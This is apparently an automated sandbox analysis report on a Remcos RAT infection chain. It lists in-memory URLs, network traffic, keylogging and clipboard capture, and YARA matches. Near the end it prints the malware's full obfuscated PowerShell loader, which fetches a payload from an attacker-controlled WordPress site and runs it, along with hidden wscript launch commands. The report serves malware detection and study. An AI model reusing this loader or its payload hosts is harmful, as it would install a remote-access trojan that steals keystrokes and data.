                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F0B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACD3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E9A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.informacionoportuna.com
                        Source: powershell.exe, 00000017.00000002.2087405410.000001EA3EFFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.00000168936A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.000002905F3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3A861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2859978942.000001311D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2087405410.000001EA3F00F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E7B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2055308899.000001208E79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2029330543.0000024E81B7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3037888768.00000155ACC90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E97D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2182959940.000002102E96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E00049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2106609777.0000016E0005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2165372957.000001C282868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 00000005.00000002.1800597027.0000020F81458000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1B3E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993E47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B32E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/07/r
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1A99C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt
                        Source: powershell.exe, 00000024.00000002.2184970580.000001B993911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1A858000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B32E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3ABF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49744 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49745 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000027_2_0040A2B8
                        Installs a global keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,27_2_0040B70E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,27_2_004168C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,27_2_0040B70E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,27_2_0040A3E0

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Contains functionalty to change the wallpaper
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041C9E2 SystemParametersInfoW,27_2_0041C9E2
                        Source: powershell.exeProcess created: 42

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects known downloader agent Author: ditekSHen
                        Source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Wscript called in batch mode (surpress errors)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
